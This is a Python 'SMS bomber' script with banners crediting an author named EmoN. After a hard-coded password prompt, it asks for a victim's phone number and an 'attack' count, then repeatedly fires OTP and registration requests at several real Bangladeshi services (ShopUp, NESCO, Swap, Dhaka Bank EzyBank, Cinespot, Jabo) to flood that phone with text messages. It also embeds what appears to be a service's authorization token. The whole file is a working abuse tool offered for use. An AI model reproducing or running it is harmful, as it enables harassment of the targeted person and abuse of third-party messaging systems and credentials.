import os

# Bold High Intensty
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan
biehite="\033[1;97m"      # White
import os
print(bired+"""
´´´´´´´´´´´´´´´´´´´ ¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶´´´´´´´´´´´´´´´´´´´`
´´´´´´´´´´´´´´´´´¶¶¶¶¶¶´´´´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´´´´´´´
´´´´´´´´´´´´´´¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶´´´´´´´´´´´´´´
´´´´´´´´´´´´´¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´´´
´´´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´´
´´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´`´´´´´´´´´´´¶¶´´´´´´´´´´`
´´´´´´´´´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶´´´´´´´´´´
´´´´´´´´´´¶¶´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶´´´´´´´´´´
´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´¶¶´´´´´´´´´´
´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶¶´´´´´´´´´´
´´´´´´´´´´´¶¶´¶¶´´´¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶´´´¶¶´¶¶´´´´´´´´´´´
´´´´´´´´´´´´¶¶¶¶´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶´¶¶¶¶¶´´´´´´´´´´´
´´´´´´´´´´´´´¶¶¶´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶´¶¶¶´´´´´´´´´´´´´
´´´´¶¶¶´´´´´´´¶¶´´¶¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶¶¶´´¶¶´´´´´´¶¶¶¶´´´
´´´¶¶¶¶¶´´´´´¶¶´´´¶¶¶¶¶¶¶´´´¶¶¶´´´¶¶¶¶¶¶¶´´´¶¶´´´´´¶¶¶¶¶¶´´
´´¶¶´´´¶¶´´´´¶¶´´´´´¶¶¶´´´´¶¶¶¶¶´´´´¶¶¶´´´´´¶¶´´´´¶¶´´´¶¶´´
´¶¶¶´´´´¶¶¶¶´´¶¶´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´¶¶´´¶¶¶¶´´´´¶¶¶´
¶¶´´´´´´´´´¶¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶´´´´´´´¶¶¶¶¶¶¶¶¶´´´´´´´´¶¶
¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶´´´´¶¶¶¶¶¶¶´´´´¶¶¶¶¶¶¶¶´´´´´´¶¶¶¶¶¶¶¶
´´¶¶¶¶´¶¶¶¶¶´´´´´´¶¶¶¶¶´´´´´´´´´´´´´´¶¶¶´¶¶´´´´´¶¶¶¶¶¶´¶¶¶´
´´´´´´´´´´¶¶¶¶¶¶´´¶¶¶´´¶¶´´´´´´´´´´´¶¶´´¶¶¶´´¶¶¶¶¶¶´´´´´´´´
´´´´´´´´´´´´´´¶¶¶¶¶¶´¶¶´¶¶¶¶¶¶¶¶¶¶¶´¶¶´¶¶¶¶¶¶´´´´´´´´´´´´´´
´´´´´´´´´´´´´´´´´´¶¶´¶¶´¶´¶´¶´¶´¶´¶´¶´¶´¶¶´´´´´´´´´´´´´´´´´
´´´´´´´´´´´´´´´´¶¶¶¶´´¶´¶´¶´¶´¶´¶´¶´¶´´´¶¶¶¶¶´´´´´´´´´´´´´´
´´´´´´´´´´´´¶¶¶¶¶´¶¶´´´¶¶¶¶¶¶¶¶¶¶¶¶¶´´´¶¶´¶¶¶¶¶´´´´´´´´´´´´
´´´´¶¶¶¶¶¶¶¶¶¶´´´´´¶¶´´´´´´´´´´´´´´´´´¶¶´´´´´´¶¶¶¶¶¶¶¶¶´´´´
´´´¶¶´´´´´´´´´´´¶¶¶¶¶¶¶´´´´´´´´´´´´´¶¶¶¶¶¶¶¶´´´´´´´´´´¶¶´´´
´´´´¶¶¶´´´´´¶¶¶¶¶´´´´´¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶´´´´´¶¶¶¶¶´´´´´¶¶¶´´´´
´´´´´´¶¶´´´¶¶¶´´´´´´´´´´´¶¶¶¶¶¶¶¶¶´´´´´´´´´´´¶¶¶´´´¶¶´´´´´´
´´´´´´¶¶´´¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´¶¶´´´´´´
´´´´´´´¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶´´´´´´´
             """)
 
while True:
     
     passw="Emon"
     
     inppass=str(input(bigreen+"\n[>] Enter Password: "))
     if   passw==inppass:
         print(bipurple+"\nYour Entered Correct Password")
         break
     else:
          print(bigreen+"\nYou Entered Wrong Password ")

os.system('clear')
# Bold High Intensty
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan
biehite="\033[1;97m"      # White


os.system('clear')

print(bigreen+"""\t

            
  _______ _     _                            
 |__   __| |   (_)                           
    | |  | |__  _ ___                        
    | |  | '_ \| / __|                       
    | |  | | | | \__ \                       
   _|_|_ |_| |_|_|___/_   __  __             
  / ____|      |__   __| |  \/  |            
 | (___  _   _ ___| | ___| \  / |            
  \___ \| | | / __| |/ _ \ |\/| |            
  ____) | |_| \__ \ |  __/ |  | |            
 |_____/ \__, |___/_|\___|_|  |_|____        
  / ____| __/ |     |__   __|  |  __ \       
 | |     |___/___  __ _| | ___ | |__) |      
 | |    | '__/ _ \/ _` | |/ _ \|  _  /       
 | |____| | |  __/ (_| | | (_) | | \ \       
  \_____|_|  \___|\__,_|_|\___/|_|  \_\      
 |  _ \                                      
 | |_) |_   _                                
 |  _ <| | | |                               
 | |_) | |_| |                               
 |____/_\__, |                               
 |  ____|__/ |                               
 | |__  |___/ ___   ___  _ __                
 |  __| | '_ ` _ \ / _ \| '_ \               
 | |____| | | | | | (_) | | | |              
 |______|_| |_|_|_|\___/|_| |_|       _____  
 |  \/  |     | |  | |               |  __ \ 
 | \  / | __ _| |__| |_ __ ___  _   _| |  | |
 | |\/| |/ _` |  __  | '_ ` _ \| | | | |  | |
 | |  | | (_| | |  | | | | | | | |_| | |__| |
 |_|  |_|\__,_|_|  |_|_| |_| |_|\__,_|_____/ 
                                             
                                             
""")



print ("""
   ╔═════════════════════════════════╗
   ║ AuTHor   : EmoN ツ              ║
   ║ FaCeBooK : iTzEmoN              ║
   ║ GitHuB   : iTzEmoN              ║
   ╚═════════════════════════════════╝




""")






import requests
from requests.structures import CaseInsensitiveDict
number  = str(input("[>] EmoN Sir apNar aTTack NumBer DiN: "))


amount = int(input("[>] EmoN Sir apNar aTTack ar PoriMaN LikHuN: "))



url = "https://shopup.com.bd/users/send_user_otp.json"

headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/json"

data = '{"user":{"login":"88'+number+'","resend":false,"type":{"register":true}},"direct_login":true}'
url1 = "http://nesco.sslwireless.com:80/api/v1/login"

headers1 = CaseInsensitiveDict()
headers1["Content-Type"] = "application/x-www-form-urlencoded"

data1 = "phone_number="+number


url2 = "http://27.131.15.19/lstyle/api/lsotprequest"

headers2 = CaseInsensitiveDict()

headers2["Content-Length"]="48"

headers2["Content-Type"]="application/json;charset=utf-8"

data2 = """{
  \"shortcode\": \"2494905\",
  \"msisdn\": \"88"""+number+"""\"
}"""





url3 = "https://prodapi.swap.com.bd/api/v1/send-otp/login"

headers3 = CaseInsensitiveDict()

headers3["X-Authorization"]= "QoFN68MGTcosJxSmDf5GCgxXlNcgE1mUH9MUWuDHgs7dugjR7P2ziASzpo3frHL3"

headers3["Content-Type"] = "application/json"

data3 = '{"mobile_number":"'+number+'","referral":false}'

url17 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers17 = CaseInsensitiveDict()

headers17["Content-Type"]="application/json; charset=UTF-8"

data17 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'
url40 = "http://www.cinespot.mobi/api/cinespot/v1/otp/sms/mobile-"+number+"/operator-Robi/send"
url31 = "https://api.jabo.com.bd/api/bulk-sms/send-bulk-sms"

headers31 = CaseInsensitiveDict()
headers31["Content-Type"] = "application/json"

data31 = """
{"data":"U2FsdGVkX1/WHfCUv213tTq4Nglc49nmusd6FmDmIS+hV9hLyoTeNiTkSJSa499d7tEkS75j13/f4RIWsvGiB6tTvZ9vDv8zCJq6ihgJhSc3nfqBOkF/lx05dI13gmiKoGmOQ8r/lTCSQ1N+tK29PAl5sj1Hlha2UboRMxQHs5sLELraVquPRnzEk3c4Wh59"}

"""
for i in range(amount):
	try:
		resp = requests.post(url, headers=headers, data=data)
		resp1 = requests.post(url1, headers=headers1, data=data1)
		resp2 = requests.post(url2, headers=headers2, data=data2)
		resp3 = requests.post(url3, headers=headers3, data=data3)
		resp17 = requests.post(url17, headers=headers17, data=data17)
		resp40 = requests.get(url40)
		resp31 = requests.post(url31, headers=headers31, data=data31)
		print(bipurple+str (i+1)+" Sms	 " +biblue+"Sent	"+bicyan+ "Succesfull ✅")
	except:
		print (bigreen+"EmoN SiR"+biblue+"ApnaR Phone a NeT NeY"+bicyan+" DoYa Kore Phone"+bipurple+"Network a RakhuN")
		
	
